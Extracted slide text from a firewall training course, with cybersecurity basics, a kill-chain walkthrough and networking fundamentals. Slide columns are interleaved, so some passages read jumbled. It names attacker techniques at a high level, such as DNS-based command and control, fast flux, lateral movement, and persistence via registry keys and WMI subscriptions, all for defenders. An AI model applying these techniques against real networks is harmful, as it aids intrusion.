“Aprenderedes,peroaprendebien”

Firewall Multimarca
Cisco ASA, Firepower, Fortinet, Palo Alto, Pfsense y OPNsense
Instructor: Lino Quivén
CCSI: 32324
WhatsApp: +528180298242
email: [email protected]
https://mx.linkedin.com/in/lquiven
https://www.youtube.com/c/kalinetworks
https://t.me/networkskills
Oct 21, 2016
Mirai Botnet DDoS Attack on Dyn

“In a relatively short time, we've taken a system

built to resist destruction by nuclear weapons
and made it vulnerable to toasters*.”
Jeff Jarmoc, Salesforce.com Head of Security

*Actually mostly webcams, but toasters are more quotable.

Why Do We Need Next-Gen Security?
What Are the Current Attack Types?
White Hat Hackers (also known as ethical hackers) are Red hat hackers are like the pseudo-Robin Hood of the
the polar opposite of their black hat counterparts. They cybersecurity field — they take the wrong path to do the
use their technical skills to protect the world from bad right thing. When they find a black hat hacker, they deploy
hackers. dangerous cyber attacks against them.
Blue hat hackers are security professionals that work
Grey hat hackers’ intentions are often good, but they outside of the organization. Companies often invite them to
don’t always take the ethical route with their hacking test the new software and find security vulnerabilities
technics. before releasing it.

Black hat hackers are the evil guys who want to use Green hat hackers are not aware of the security
their technical skills to defraud and blackmail others. mechanism and the inner workings of the web, but they
are keen learners and determined (and even desperate) to
elevate their position in the hacker community.
Tools Used – By Attackers
 Focus on Methodology,
Not Tools!

• Original work by Lockheed Martin

• Inspiration from military kill chain
• Model describing structure of attack
• Note that attackers are not legally bound to
follow the exact model ☺….
• E.g., may establish persistence before
lateral movement…
• Still useful to understand stages of attacks
• Instead of focusing on specific exploits
MITRE ATT&CK
Cyber Kill Chain

Vs

MITRE ATT&CK
 Reconnaissance
Recon
• Social:
• Business, organization…. Gain Foothold
• Employees - Attack Delivery
- Exploitation
• Email addresses,
organization, friends, Tech Forums
interests…. Command &
Control
https://www.exploit-db.com/
google-hacking-database/ Local Compromise

• Servers, Applications, Infrastructure Lateral Movement

• Use (automated) scanning to find out about target’s Establish
public servers Persistence
• Operating systems, versions, vulnerabilities
• Applications, versions, vulnerabilities Exfiltration
 Gain Foothold
Recon
• Physical attacks
Gain Foothold
- Attack Delivery
• Attack public web servers - Exploitation

Command &
Control
• Exploit client-side vulnerabilities
• Exploiting bugs in clients Local Compromise
• Social engineering
• Get a user to open attachment or click Lateral Movement
on a link to run vulnerable application
or plugin Establish
Persistence

Exfiltration
 Command and Control (CnC)
Recon
What do you think: Gain Foothold
- Attack Delivery
• What is the most popular protocol suite used for CnC? - Exploitation

Command &
Control

Local Compromise
Active Internal
Public Directory Servers
Servers Lateral Movement

Establish
Internet NGF
W
Labrats.se IoT
Persistence

Clients Exfiltration
Command and Control (CnC; Cont.)
Recon
• Typically use protocols allowed outbound: HTTP, HTTPS,
SMTP, DNS Gain Foothold
- Attack Delivery
• If using HTTP, the CnC may still be encrypted at application level - Exploitation
• 91.3% of malware uses DNS*
Command &
• Dynamic DNS circumvents blacklists Control
• Setting short TTL (“Fast Flux DNS”) allows changing IP/host in
case it is blocked or taken down Local Compromise
Active Internal
Public Directory Servers
Servers Lateral Movement

Establish
Internet NGF
W
Labrats.se IoT
Persistence

Clients Exfiltration
Attackers Want to Become Admins
Recon
• Without it, attacker is able to read/write all files, emails, etc. of
the victim
Gain Foothold
• But he may want to move laterally in the network and attack - Attack Delivery
other machines: - Exploitation
• Install (malicious) software
• Sniffing network traffic with ARP poisoning Command &
• Reading passwords and hashes from memory Control

Normal user Local Compromise

• May read/write Administrator/Superuser
assigned files • Can do anything on local machine
• May NOT • Install software, Modify drivers Lateral Movement
• Install software • Install sniffer & keyloggers
• Modify drivers • Read any memory location Establish
• Install sniffer Persistence

Exfiltration

14
Lateral Movement
Objective: Take control of other clients, servers, IoTs Recon
and the Active Directory Domain Controllers
Gain Foothold
- Attack Delivery
• Note: In many organizations IoT devices - Exploitation
may be the most valuable assets!
Command &
• Healthcare Control
• Airports
• Manufacturing Local Compromise

• …even a printer may be valuable

Lateral Movement
• Often run unpatched versions of Windows XP or older Linux….
• Sometimes patches or installing security software is not even allowed! Establish
Persistence
• Often run with default username/passwords
Exfiltration
Establish Persistence No antivirus will
detect this…
• Persistence after reboot Recon
• Upload executable (exe, DLL, vbs…)
Gain Foothold
• Make executable run after reboot/login/scheduled - Attack Delivery
- Exploitation
• Create service, Registry: Run, RunAs
• Startup folder, Scheduled tasks Command &
Control
• File-less Persistence
• Use WMI with event subscription to execute code after reboot Local Compromise
• No “file” written to disk, just modifying legitimate OS configuration file:
• %SystemRoot%\System32\wbem\Repository\OBJECTS.DATA
Lateral Movement

Establish
Persistence

Exfiltration
 Exfiltration
Recon
• With the domain hashes and/or the Golden Ticket, for example, the
attacker can impersonate any domain user and access any file share, Gain Foothold
web server. From there on, data will leave the network… - Attack Delivery
- Exploitation

Command &
Control
Hoarding Local Compromise

Defense
Lateral Movement

Establish
Persistence

Exfiltration Exfiltration
 Zero-Day Attack
Perimeter Enterprise Network
(Inbound)
2 Reconnaissance and
Network Traversal
1 Infiltration and
Backdoor establishment

CnC Server
Attacker

5 Data Admin Node

Exfiltration 3 Exploitation and
Perimeter Privilege Elevation
(Outbound) Staging and
4 Persistence (Repeat 2,3,4)
Key Point: Integrate Your Defenses
• Avoid silos!
• Cooperation between:
• Security
• Network
• Desktop/Clients
• Active Directory
• IoT
• Training
• …
Agenda

• Cybersecurity Basics • Cryptography

• Firewall in General • VPN site to site (ipsec)
• Basic Config (hands on) • Clientless VPN
• Object and Policies • Syslog
• PBR • HA – Active/Passive
• DMZ
 Learner Introductions

▪Your name
▪Your company
▪Job responsibilities
▪Skills and knowledge
▪Brief history
▪Objective
Cybersecurity
 Cybersecurity Goals

Confidentiality = Protect sensitive data

Integrity = Ensure no unauthorized

modifications

Availability = Authorized people can

access it
Risk = Vulnerability x Threat
Assets, Vulnerabilities
 The Challenge
• Attackers are skilled and motivated
• Attackers are engineers
• Learn from others, reuse code, or write your
own
• Test before putting in production:
• Will it bypass antivirus?
• Will it bypass IPS?
• Will it bypass NGFW?
• Will it bypass Sandboxing?
Option 1: Hope You Are Secure
Option 1: Hope You Are Secure
Option 1: Hope You Are Secure
Option 2: Validate You Are Secure

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public
Option 2: Validate You Are Secure

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public
Option 2: Validate You Are Secure

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public
 Key Point: Integrate Your Defenses

• Avoid silos!
• Cooperation between:
• Security
• Network
• Desktop/Clients
• Active Directory
• IoT
• Training
• …
 Next-Gen Security Infrastructure Must…

PROTECTION VISIBILITY MITIGATION AUTOMATION

Stay ahead of View the network Detect and contain after Respond quickly with
the evolving threat holistically and compromise has integrated defense
landscape heuristically already occurred systems

0
1
1
1
0
1110011 110011 101000 011 1110011 0
110011 101000 011
1
0
0
1
1
1
0
Questions ?

175
Network Basics
Network Device Communication
Without a Rock Solid Foundation the Rest Doesn’t Matter
 Reference Models
The OSI Reference Model

PDU
Protocol Data Unit

Payload
Payload
Encapsulation

Dencapsulation
TCP | UDP TCP | UDP

IPv4 | IPv6 IPv4 | IPv6

Ethernet or
Ethernet or
Wireless
Wireless
 Ethernet Frames
Ethernet Frame Fields

1 Byte = 8 bits = octect

MTU
1 bit = 0 or 1
1 nibble = 4 bits (used for Hexa) IEEE 802.3 IP Packet

7 1 6 6 2 46 to 1500 4

Preamble Start of Destination Source Length/ 802.2 Frame

(10101010 Frame Address Address EtherType Header and Check
10101010 (0x0800 IPv4
10101010 Delimiter Data Sequence
(10101011) 0x0806 ARP
10101010 0x86DD IPv6
10101010 Etc)
10101010)
Frame Delimiting Addressing Error
Detection
LLC sublayer
MAC sublayer
Purpose of the Data Link Layer
ARP MAC Address Port
 Network Device Communication
Virtual LANs & Trunks

access vlan 10 access vlan 10

802.1Q
10 FRAME access vlan 20
access vlan 20
FRAME 20 FRAME FRAME
30 FRAME

access vlan 30 access vlan 30

switchport mode trunk
 Routing between VLANs
Layer 3 Switch

Router on a Stick
EtherChannel Bundle
Multiple Links
Network Device Communication
Layer 3 Forwarding and Local Network Forwarding

10.10.10.0/24
172.16.1.0/24

192.168.100.0/24 10.10.20.0/24

Router X

172.16.2.0/24
10.10.30.0/24
 10.10.10.0/24

172.16.1.0/24

10.10.20.0/24

172.16.2.0/24

Network Destination Exit Interface

Protocol Network 10.10.30.0/24
Connected 172.16.1.0/24 Gi0/1.10
Connected 172.16.2.0/24 Gi0/1.20
Learned 10.10.0.0/16 Gi0/0
 IP Routing Table
Static vs Dynamic Routing

Dynamic Routing Static Routing

Configuration Generally independent of the
Increases with network size
Complexity network size
Topology Automatically adapts to topology
Administrator intervention is required
Changes changes
Suitable for simple and complex
Scaling Suitable for simple topologies
topologies
Security Less Secure More secure
Resource Usage Uses CPU, memory, link bandwith No extra reources needed
Route depedens on the current
Predictability
topology Routes to destination is always the same
Network Device Communication
IGP or EGP
 Autonomous System
Area 0
(Backbone Area)

redistribute
Backbone

ASBR

summary
summary

summary
ABR ABR

ABR = Area Border Router

ASBR = Autonomous System
Border Router
Internal
Area 1 Area X Area 51
 DHCP for IPv4

DHCP Discover (Broadcast)

DHCP Offer (Unicast or Broadcast)
DHCP Request (Broadcast)
DHCP Acknowledge (Unicast or Broadcast)

DHCP Client
DHCP Client Configuration: Discover
• IP Address
• Subnet Mask Offer
• DHCP Server Identifier
• Default Gateway
• DNS Server Request
• Lease Time
• Extra options
Acknowledge
 RFC 1918
“Address Allocation for Private IP”

CLASS RFC 1918 Range CIDR Prefix

A 10.0.0.0 - 10.255.255.255 10.0.0.0/8
B 172.16.0.0 - 172.31.255.255 172.16.0.0/12
C 192.168.0.0 - 192.168.255.255 192.168.0.0/16
 Types of IPv4 Addresses
Routing to the Internet (NAT)
LAN RFC 1918
LAN RFC 1918

Internet
Route + NAT Public IP
Route + NAT + Policy
TYPE 1 HYPERVISOR (bare metal)
TYPE 2 HYPERVISOR (hosted)
 https://github.com/ishare2-org/ishare2-cli
docker pull pnetlab/pnet-wireshark
ishare2 mylabs /opt/unetlab/labs/ all
Questions ?

175